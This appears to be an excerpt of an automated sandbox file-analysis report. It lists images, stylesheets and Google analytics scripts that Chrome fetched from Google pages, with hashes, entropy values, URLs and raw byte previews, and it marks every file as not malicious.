                                                                                                                                                                                                                                                                                          Preview:.touts{background:#f8f9fa}.touts__grid{column-gap:calc(var(--grid-column-gap)*2)}@media(max-width: calc(600px - 1px)){.touts__grid{--grid-column-gap: 24px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.touts__grid{--grid-column-gap: 24px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){.touts__grid{--grid-column-gap: 44px}}@media(min-width: 1440px){.touts__grid{--grid-column-gap: 64px}}@media(max-width: calc(1440px - 1px)){.touts__grid{margin:0 auto;display:grid;row-gap:48px}}@media(max-width: calc(1440px - 1px))and (max-width: calc(600px - 1px)){.touts__grid{padding:0 24px;max-width:600px}}@media(max-width: calc(1440px - 1px))and (min-width: 600px)and (max-width: calc(1024px - 1px)){.touts__grid{padding:0 min(5vw,72px);max-width:600px}}@media(max-width: calc(1440px - 1px))and (min-width: 1024px)and (max-width: calc(1440px - 1px)){.touts__grid{padding:0 min(5vw,72px)}}@media(max-width: calc(1440px - 1px))and (min-width: 1440px){.touts__grid{max-width:1600px}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 343, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):330224
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983137654901116
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:gIgphYIkSBvqWlri4i7XMidorq5gvcCE9oIygj4AvgS/h6F2SIeCy:gIghYyBblrxiLMidorcSc5V4Av/h6cXy
                                                                                                                                                                                                                                                                                          MD5:02D7F917F2C729DEFDF85E85576F3612
                                                                                                                                                                                                                                                                                          SHA1:84B4B710A4F35D3517C048EFA2308F6CA6545335
                                                                                                                                                                                                                                                                                          SHA-256:E48B9AD41BD15F25A6E867B5AD51C48376CE5E2CBCD785674B788F5D7E2E23A3
                                                                                                                                                                                                                                                                                          SHA-512:A8C4B4AA75C06C025600932F33EBBBBD96C3B35F7C21C677F3EC685889F03F9D3B907B70FC7C969B4973D2E010DD9D5047F7115E18B6F75715A3DE971F93A5EF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/FW12KWakQzfFfGUf5yZghWb6h6-6dNMOHBolWF3nYWgOQdsiTeL_BS_PSvWy_1Y4d1OoZuzXpT6ihCY2z0iT2xjEQMMIoMsh7bbmd001ICguMO4kLhA?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......W.....[ya....eiCCPicc..H..W.XS...[......... ...Z..R..!.$........k.Q....+ ......bAEY.uQ..7!.]....;...O..3....e.\T..<i.<>2.565.Ez.P...9.....;...@.....n.D._uQq.s....P......8C...A....A ...@T...T..b.9....*...T8C...m..9._.@.......zV. ...?A.&.J.....8H ..!V.>,/o...C...e..x.o.7.Y.........:.~...(d....gi....*.|..F...U......Sa*...XU.!...u.....QIj{.T.....&.nB~..bS.#..1..}F.$..1\-.4I>7.b#........-...._hm.........~U..(s....7b.W....).S .).$.@L..U.....,.sb.l..xU.6.....j~. S..../.S..m.K.1.| _.....vR....].I.I.<"...\...pu..s.4)A..#...W..)..8.=n%.T. .T.$h....pq...LY~\.:N.0.?*N....D....,..-.L..@..Y....G"...A.....f`FJ...>.@!..".P..........<.U?]@f.hA......<......t.[2x.5..x..&..........W..j.5..G..%1..F."F..q.<.....3.6w......=.)....p..F.=I2O.]..A...."..Z.v......!;d...p.=..6..={A-G...*.....7....FF.C.!d..g..^.,.Z.[.u.......|..M....}o.-..bg...9....,..V.].....z........y$.....TUR.V....I=./....x...rI.8.._...+...c........__o.....y..n.%.........x.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):260521
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.570086366904628
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:5sVpmFU7uli04d7G3BsEemvegNpH0fxnQF:u+W7u4nhiky
                                                                                                                                                                                                                                                                                          MD5:8F47685EB91BCE4623322ED375AA3922
                                                                                                                                                                                                                                                                                          SHA1:BF4855B91B1DC43FE709BECA63917EE5BE6F1B5F
                                                                                                                                                                                                                                                                                          SHA-256:2102B509EAD7CA1205F58AB24C120A9766E2A4F5986322ADD8B38851EF6F06B3
                                                                                                                                                                                                                                                                                          SHA-512:C4964477BE646763E99E44116724CA6B8580783EB1EFD8C02619E0E8498C5727C4A49F77272D99A53864B36641378460674C127133ACA8364F64A0B37D9C947F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-JYV685WXW5&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8509)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):249330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.556039880959759
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:8ax8eulMYeiTiG007lXol0VQbQwM87Ns0RsEemtJeNvZzVDOLN5t8:8pmF8lq0Ud7PsEemvetzO/G
                                                                                                                                                                                                                                                                                          MD5:B4A7CA65DEB07EB77E6458470CF7CB3E
                                                                                                                                                                                                                                                                                          SHA1:37E3491323F3F92E975AFFAECBC147505864DAB4
                                                                                                                                                                                                                                                                                          SHA-256:D64B4551F1DC05D43C0E8F4E5BAAB58CB717D90060F2064864966BBC0F37AD49
                                                                                                                                                                                                                                                                                          SHA-512:A5C7E38B69E331344E664A8589CBFF5B39414D4707D8210AC5FED28FD2DB3F00C31E9F68A73CEEE3819C23194D0B28946C2F76DD753B0B0751D77EBDFE4D07B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-THMG5X6
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"15",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__u","vtp_stripWww":false,"vtp_component":"HOST","vtp_customUrlSource":["macro",0],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",1],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_defaultValue":"false","vtp_ignoreCase":true,"vtp_map":["list",["map","key",["template",".*",["macro",2],".*"],"value","true"],["map","key",".*kintaro|appspot.*","value","true"]]},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",2]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):219
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2955739207570645
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:K6gjH7o4j35wK/RhgLRat+2YyRdP4zuFDLV6qmiUBw:fjI5wmhO+rYyRhXsnw
                                                                                                                                                                                                                                                                                          MD5:FE009C46DD1D23007374C2BE51B675A2
                                                                                                                                                                                                                                                                                          SHA1:8E25D24DD7D3ED9A15E8D62D3907AA5225FEAA13
                                                                                                                                                                                                                                                                                          SHA-256:4560AC801C2117E438FA30DF99383F06FF99AD60E0D7BDB0D8B5979A16B92E42
                                                                                                                                                                                                                                                                                          SHA-512:25016B672A5932CC3201EC3558F51609CF7BBD8164494D6302A751D4B823996AD92D673DDE80C10DCE7F48FFC1945C1ED78848B91B5A02616AAE57F06E36326A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/p9kcPq91.min.js
                                                                                                                                                                                                                                                                                          Preview:import{o as e}from"./0XPwTFcg.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function n(o){return e({finisher:(r,t)=>{Object.assign(r.prototype[t],o)}})}export{n as e};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3398
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.901602155910697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:qZmrYmztjK0iqidO9WONXqtmt0VQ7S+Tl44IgG6jP:qMbz5K0n9xtIW6Q7S+544IIz
                                                                                                                                                                                                                                                                                          MD5:4A47009495D78EA7CB1DCEE7FC77455B
                                                                                                                                                                                                                                                                                          SHA1:1A22741247779DC4D4A40968A972D779B781502E
                                                                                                                                                                                                                                                                                          SHA-256:2110BE636901ACC51D587F1C0DE3F371A42D8C2D287E8DE243F6F6C6DDFF8E5B
                                                                                                                                                                                                                                                                                          SHA-512:E15F242DC659CF3147671373FC360042A4B13CE949636EC1DECF27BD72F76169406F80E1367CF39121CD2980DB6FA58DEB991AB1B07E65336EB69B014F4B7ACD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/hHWA5otDm9mYUJdAqTjo7wBWj8euY-SdEhCffO7oQzG3zpzxm-YExt1VDB8X6_5gchW_Ye3bfhOJXyOWgcUr94GtgqltKP4IxiH02O-Xzw5A1IHsxiw=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{pT.....{w7.'.$.WDD.........Bj.I.L...i..U....Z....Z.U.m.#.B.Z.i.[...A.....f.}.{~.c...d.....|f2..s~....s~.u....D".H$..D".H$..D".$........-...s..y....4W.cp....X.B.....C.....C{...drW..d..........`.&..5...T..2D=......u.-W.....`$].......c._.l....H......n...'..OR....`X.A...MTH..".....]4;.)... ..G...J..t.H4.0n....x.0.7m....`.........S.*AB.n...1..L...........3#.m...].....c..i73 .z...W;.H.Wn.....0.W.;.....qkhn2.."..;i...q...{.......^Gm....Eo..S...;.3r ..q....[.......%.s..`,...$....J.H.qu..'.3)n.p.>...+.>b..]<.....0#..J..+..b..#.DUs.K.R6c.......@}.....$....S.m.!..l..e9......"...................r...p85..CEN...<...T.. DDl!.Y!..yr.6.....Y.i[xq"...U.@[G.MG:.x...<.o[.........."J.....(.aL6..*@....s.. .@..ad(*..+...]4..y'.@p.^...*....n<..x..9.89..... ....%u...pq.bz)...F.;..>p.......6...E.Te.......Z.^a.;C.`....a.......3....@.@.h.n.=.... ..B..-53...tmQ`...+.......w.~..>...j..f2..n..n..3....@...u
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10341
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.971936202585003
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:XfkacKn221yb09Ga5N9bcsOOqlG4fSmMpVFCIN2zhKyQS6+JGZeBaZH:Xhd2xoV5/bzqlNfS56/Xv8eM5
                                                                                                                                                                                                                                                                                          MD5:E639FEDFEB77DCBC4A25E6AA7116353A
                                                                                                                                                                                                                                                                                          SHA1:96FC2BD806BF9B04D652EA329762967CC405076C
                                                                                                                                                                                                                                                                                          SHA-256:DF79FDAEADC0FA5E3FF483649B9FB45B607EE4E54EE79405B90A39BB0F80E020
                                                                                                                                                                                                                                                                                          SHA-512:908BA29C49F68E8DB7090B03107E08A4C1002A9586F1BEDAF41EC8C72E0A9E01622DF4E495BA673E6B388D49A12EE7F480183C699C9B8E7FF2274C0BDA93D2DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.\Gu.n..jf$.$k.$..ly76x.....`.....y@ +<..^.I.K...cI.O.bC.C.Yb..&.xC...$[.e.....}.:.{o/3...3=.........nU..:uj.p.Gq.Gq.Gq.G.r.3....7..d.3.....#.FD.....9E.P..?.m.......#..N.g...^rA6.rp.............RQ...G.......I....,.....&..x.Cb........X..../.=e;..-...3G...\......YG.o.T:A.8.Y#F..)jC..u..V....@.." ..A..x......GDw....tf....^q.....G..m.g....b..,9..9Y...j...(.h.a..j%..Z.w#....1.I..L.....z..6.]...>(.'..x.{:[...yK...Wd.._x....K.t...S.c..E.RL..T....-...oU z.d2...O./........O...O.`~%]\<..~.....KV\."..R.t..x.Ki.......`....o.$.n</./.C...T...S{...KwM5..s....;/. .:n..F.Z....Wb-j.........Br....<...}...1j....y..._j........t.kL:..v.x2.?..F}j+...3.D.....&...$.M........Z{......uW......[(.X..}:.P.......B.8....L>?........Y....o.....#..7......'.Q./.G...6.NM..T..Z2..~`..n....<.s.w]y.1..n..._..:.T...B.#Bp.s%....=X:../..}..g.sxN.~...n*..k;~.1y-.<..9..'.9.w.....7....3..<'....A...../...4".r.Y..<.\...\.s
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8166
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958002733271823
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:N51UecXdlWqFN8DCo3JHnkxLJa5kTKoLQsdPjN+GssopnH:r1uXdlWYN8+6HnULJa+TK4dPjsZsotH
                                                                                                                                                                                                                                                                                          MD5:49D3C8ADBA7ABEBAB8CDDB827EF0D6BE
                                                                                                                                                                                                                                                                                          SHA1:17223539D6A3D813F4DD018924B30F79A8DCCA50
                                                                                                                                                                                                                                                                                          SHA-256:D54ADA881901A560A369021F3D2F3D395AC36FCA18FB3E61C16E64555156F0E5
                                                                                                                                                                                                                                                                                          SHA-512:28335306B7F6738D3F87DB973E2D77DCCBB4DA4C3661394B6C880035513908C405ADD42E2780C286CB29C88BBA822DB5DF1B23CE2DDDA3FAEB08E7BE49CB8B91
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..itdWu....[.........l...L.1.!$LIX+Y/...9y..|x.b9.X...+`.y|.....p...`..#x.=..nlw.ZRKU.Ku.9.}.R.T....+..._....=.=....g....8..8..(..w..B>.O.a.n...c....1&..sN8.j.Qk.z.#..H.(x..c.l..n..#.Y.s.\......5...z.....Ed..v.-".VU.......T..L..@?...y.x>...D"....e...~.8p..|..A...vU.j..d..BU.....V.#.2.{#P.y......U.q..}........;..3}.d.*.........P.3. .ZU..:...&.Q.j.U....(....vW{{..5).2qT.<55.<33s..^h..RD.T..c..Z..d...>.E.... .?..N.k.."8..{.7.ND..N...hUQ&[.gU.>U..1.l6;..e..QQs.....{...Fk......ZPUT...>.|7.N.#.N..].u..|>...~c..@.Fl%........;;;.Z..[m.r........r..;.....A...M.......R....79..,..M...V@.0< "........|Mk.9.=>>~.1.r...2.....a..,.L....ud..]3.s..;....L&{.*...b....===..E~kBp>...1......([..........oUk|bb..(........0..-.}.s..]]].V+?....*....;...Z{..*(.v.`....C.W...B...ah...5.|..,....q.1.\......U.&&&.s.-....1g..*..F5I.....1. ......_l.x.M..O.'.1.c0.....:...&''c..X.......^..7.c..+."`.X;..@P...0....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 396 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):46194
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974616819355414
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:Nl9+gvA8owLA6d6C1z+07HvVyjGI+RNl1ynnoz1Rx9sTcdh8y3ETvtL2oDs1i6:NbfTA6A4+gHIyI2YQx9sTcbCL2ks1V
                                                                                                                                                                                                                                                                                          MD5:C749B23D634961F33E16EBC183C36D3A
                                                                                                                                                                                                                                                                                          SHA1:0F291F12A3185153164BF3760BB33E49A4C1544E
                                                                                                                                                                                                                                                                                          SHA-256:6E987B94E1D96926168CEBBCDDD5ECDCA93B8E6B804DEBBA7A606D7670292356
                                                                                                                                                                                                                                                                                          SHA-512:EB144F36CE7494B38848E596DAAE5CFD20EF0E29BE7B3CFD562C0ED5D89EEEA1A30DA55E3F7EC7202301AA3F6DDD758169DD0EA7FFC475B4E0641235DBBD1120
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...............[t....sBIT....|.d... .IDATx..y.$ey...[...{/{....x..o..QT@. ...".J~..DM.F..&.<.QP..(.(.CD..9....cvvw....}....VuuOwO.......~...z...>....0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0+..t..f.<...=.u..Z..T.;...J.A:.D...2...9.pL.y.....@ !.@..nP..()....p.GR....L..eC.KP.2d.$.T....~^.7m..L.p...[.S.0.....5....O.}....}}E9..!e...)3Mj......B;....*...D.......K..GA9.HJT...R...@........l.r..<,....3.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x394, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):48948
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973028110004557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:+2p0JZFC/8vThHIGeAnRrJblgo45z5HmtOf3Ug/f01EsBomZUA+xPrVCtni7:+2pq4/8vpIGe8R1bE5lmofb/fjAJZMQY
                                                                                                                                                                                                                                                                                          MD5:2E26A6A5B8434AC1FBDA95E7BB83F4CA
                                                                                                                                                                                                                                                                                          SHA1:12AD1D1066FF1750A63B6F408D795BABD7658724
                                                                                                                                                                                                                                                                                          SHA-256:0DC2EDD2A7A79A38A7D6400F390A54BA1A4DE1F8F34D1F400AB5A65F163B0861
                                                                                                                                                                                                                                                                                          SHA-512:46FEF40391FE65C450D0DD417DA10B0083EEC23EB8186AD06036BCB549B3F9187940D51ADA87DC1165B461100241181F11AFBEC0DA2FE8C7C4218C7F84C8DAA6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................J..........................!.1A.Q"aq..2...#B..R...$3br.4CSs...ct..%....DT.................................<........................!1.A."Qa.q...2..B.....#Rb.r..3................?.C.FH......p.....Q.I.k_.....y../[.(.ic.=].Ltd.g...-QP..=...5.u=c..w..oCt@>M.g..^.........%..l..0a.*._....R......x.Y...{\C{....>.v...I?..).....'.e.3......l..g.4v.......Z6.d...*#F3.S_.c...3=..S`...,.....7.vN].........<3.NK-(..[~..i.v....lh..Q..h....BH..p.V..i]s.Yz....J9S.c.B.VzI@*Mv.E.\...;.....}..L.".T....S....y..u'(z...X...>U...i....S-.yKHn. &E.....#...j".5...D..C)yU...#.q.......C....O.).I.).x.]K.0./M..!J..,.;(b.....H$(...".n).WtU..7R....R.s..*...5.0.&..W...l.....<!x.Ns.._.{...m..&$.#.=jwr..u.8$'-.Np8S...qK..kE...[O..O`vR....A.CSQ.<..p.Q..+..f.*.;.G.N..V.r.s.xU.....5..P*...P{...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 832x460, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):27692
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.993758896087244
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:U//DF+EwoNrbJNDYUSbaLlwx92sXXaqjtsZpK8qam:U/RH3jo+LlwxgsnaAtsbqam
                                                                                                                                                                                                                                                                                          MD5:85B6CA3E86D5E9F86C92BCFE903657C1
                                                                                                                                                                                                                                                                                          SHA1:F9B8208E848988A54D386C33C97FE86F31D55E2B
                                                                                                                                                                                                                                                                                          SHA-256:5D066863F636A37128F2B3B58EA904B089B4F8C676F5706326F0800A5153AAB3
                                                                                                                                                                                                                                                                                          SHA-512:7BFE3933ECB5F90A722AB8A98C9A17B936B73F970FDC15C3C392B6AEE7AA51327A18DF572807782582603E0C139648EE718AB6361D412A4FDB55B6E85A681DED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF$l..WEBPVP8 .l.......*@...>=..D"!.$..K(...em...28...%..a.K.67.v]"..d.......5..|}b...K...O.~.............E.k.._...[...7..5.......}p.e.o.o.g.........>.?......._.>._.3.......[M..S..........f.......Eq..Y..^..C..r.td..DB..Mqo...d.:hf..Q.m...../..Q..n.../..0,t.......X....Z.....#Q..`. .M......Qk...W.TK.9.%.Y%...d".hJ.x...A.......v..N...A.....c.YV{...!t.`C... ...I....5HC7.V...;....>U.`,<..6Y....,.).Y...$(<.+...dS.Uu..G.+.....^?..7..?.....;.]m..0f...:6>..6.Ql..7.Q.*.$...J.B....5T....'m84..}..k.....f..!..F{..-|=Bg[...s./....y....=....{c...~...[k.L).r...J.yQ..Q.`.:....^}y6?......as.A..B.^....U..!%.dC.PM.r..Sp ...Y..nH..:.(....$)..J.......C.!..A.<.[......Tm ....^..*.p..Q.1\..5.J".i._..%w..rR...e.....}.{a..].".M..'>N."...R.Q<&..H.d..w .e.7..a.ij..3.}...tq.d^.}.~......$\..V........*..2>..P..N&...Z..5..>f...Jzu..I...........w:R....G.N..Z...`.f>t.....Z..#.....r.....A]..SQY...5.6...........f..|.3.O....L.t..AI.<.E.77...b....c5...w.....B....:=.Bji.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3556
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897094928672599
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:s++kyqP3c82oGFmypk0mQCuNMlZ8hYCkSXWl:s+HpcBMypk0m/uNEZ8hYsGl
                                                                                                                                                                                                                                                                                          MD5:C37D2F2AEE8F607639563A99C800B0C9
                                                                                                                                                                                                                                                                                          SHA1:AC96854A7A2741ED92C1A993BDD0B317EBA05EF1
                                                                                                                                                                                                                                                                                          SHA-256:6676F28B5E7B1B9D41030F98B18A724732EEB8E0C9877BA19D29BAC50095CE07
                                                                                                                                                                                                                                                                                          SHA-512:D45FBB2AF83D421C39A0FE604AB8517AC7358C053126370F31BA77E47C317895B19E5E629B0665D169EAC45927C522F4A8F905C0F0CC8689585FF4491625CBFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i5!3i5!4i256!2m3!1e0!2sm!3i707457389!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=65539
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?.o...$...Lff..8...,..........#.3..G....<.|S....0.BTE5.^b....l..m...... ....^.$.5+H..2. Ub..)...Z.z.NIPbm...{..)....h..C..o..^..[.)...zM=..&C.If......@...l.l2uL1.Z..y$.RDr@...-.&.QL5..r.Y...."y...RE.c8.....1tWvW..>aE.s...C........g....,F*...V.3...pc.r..W..8.}.U..Q.1ms.3..../q.._..b9.+.l..+......pM..8........ .-.....X0...-._.....T....!.f.D..D...*.etw...T..(u...#....1&..(."v..."......+.#.J<.c.z9.?....f....ZQ...o..].B..D..&...\.4..16.a...X.1..<........U.nL..l..zS[.3K3......4.b.A}.T......>....m.....[.q..Qn8z...3...Y.D<=m.I8+.........G.a.l..\..(7.....{.;...]U&.....x........z.....Vn.}.f....=.....oy&.]......^<....:....z.f.r_0.....b.Q=.;.~.....r..{.....6.zO...?e..KK......>:.4...e6.gg.3G...r..p..{:.w...|......Q......2..gX6.Y.3v85?.4.1`l0..Fy....3..y.D.Re.........+...k.ID....,....g6...b..v...K........d.........6...<..Go..0..........W..>..F........K........^...Vov.....?...^....a.Z...w.Rot+7.>.dz..zw...|5....G.n.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8028
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.961392322199147
